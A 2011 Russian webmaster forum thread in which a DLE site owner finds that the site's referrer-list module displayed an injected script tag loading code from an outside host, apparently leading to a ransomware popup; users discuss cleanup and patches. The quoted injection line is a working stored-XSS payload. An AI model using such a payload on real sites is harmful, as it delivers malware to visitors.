Как я словил вирус на комп от своего сайта
Страницы: 1
Как я словил вирус на комп от своего сайта
Открыл я вчера в IE свой сайт, и IE спросил у меня разрешение на запуск скрипта со стороннего сайта. Перерыл в (просмотр html-кода) все скрипты на странице, и нашёл в выводе модуля переходы (у меня dle) такую строку
Код
» <a href="/">g<sc ript src=http://gotraf.net/in.php?id=234></script></a><br />
Как я понял, кто то перешёл на мой сайт по запросу g<sc ript src=http://gotraf.net/in.php?id=234></script>. Пока пытался понять либо сайт пытаются взломать либо вирус внедрить, уже всплыло окно, сообщающее мне, что я должен денег. Что то типа за то, что распостранял порнуху. Нод 32 с последними базами отмолчался в этот момент. Ну вирусняк то стандартный, правда всё равно день на него убил, но напрягает эта уязвимость. И потом, если бот ПС в такой момент на сайт заглянет, ведь сайт в распостранении вирусов обвинят. И чё делать? модуль убирать или может какие его доработки существуют? Вобщем, если кто сталкивался, отпишитесь, буду признателен.
Изменено: daden11 - 12 Июля 2011 17:56

Бесплатная контекстная реклама

У меня тоже такое было, всё почистил. Но вот как избавиться от етой уязвимости?
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).
Изменено: daden11 - 12 Июля 2011 22:37
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html
Блин, накаркал. Яша заметил эту шляпу,
Рисунок

и трафик сразу вниз пошёл (на картинке пользователи онлайн)
Рисунок

в ВМ появилось предупреждение о вирусе с кнопкой перепроверить. Написано,что перепроверка идёт пару дней. Вылезу ли из этого дерьма без потерь или нет, время покажет. Короче, думаю, что всё это происки конкурентов.
Изменено: daden11 - 13 Июля 2011 16:34
Цитата
daden11 пишет:
А что вы там почистили? у меня траф небольшой, но минут за 10 само ушло (показываются 5 последних переходов).

Нужно через поиск у админ-панели у настройке етого модуля найти переход с етим запросом и удалить его. После етого у меня антивирус перестал выдавать сообщение о заражённом сайте.
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.
Цитата
daden11 пишет:
И чё делать? модуль убирать

Яша за него уже наказывае... smile:)
Цитата
maxim maxim пишет:
Цитата
daden11 пишет:
вроде нашёл решение _http://my-dle.ru/1352-nedostatochnaya-filtraciya-pri-formirovanii-bloka-v-module-perehody.html

Не понимаю какая польза от етого фикса, ведь он в коде заменяет ети знаки "{" и "}", а их у вредоносном коде нету.

я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.
Цитата
Arte пишет:
Яша за него уже наказывае..

я вывод модуля переходы сделал сразу за topnews, и в коде он отображается так же как и topnews. Не думаю, что ПС его определят
Цитата
daden11 пишет:
я ещё нашёл исправления от автора модуля _http://dle-solutions.ru/dle/bags/150-nedostatochnaya-filtraciya-v-module-perehody.html там вроде корректно.

Вот за ето спасибо smile:D
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
16:08 Как вывести буржуйский сайт в топ? 
16:07 Не могу попасть в РСЯ 
15:58 Zoomclick.ru - предлагаем 1,5 рубля/ клик за операторский трафик. 
15:50 Апдейт Яндекса 09.12.2016 
15:38 Вопрос к веб мастерам 
15:00 Смена адреса админ панели WordPress 
13:44 Уязвимость DLE 11.1 и ниже 
15:53 Недвижимость без посредников 
15:45 ​ Услуга в соц.сетях: поиск аккаунтов по номеру телефона или email 
14:45 [Продажа] скрипт CPA/CPS-партнерской программы 
14:41 Продам хороший, доходный сайт с ТИЦ 40 
13:50 Услуги по рассылки спама Вконтакте 
13:46 Комплексная раскрутка сайтов. Качественные услуги, прогоны и прочее. (2000+ отзывов) 
13:46 Куплю вечные ссылки, тема: животные или около этого 
15:59 Про счетчики 
15:32 Нужно ли закрывать рекламные блоки? 
15:14 Uber запретил заниматься сексом во время поездки 
14:55 Mobytize и Vipaff приглашают на мероприятие IT Nature Party! 17-19 августа (Киев) 
14:01 Навеянные форумом картинки 
13:37 у меня запрос моего сайта на втором месте 
13:32 Не открывается teasernet.com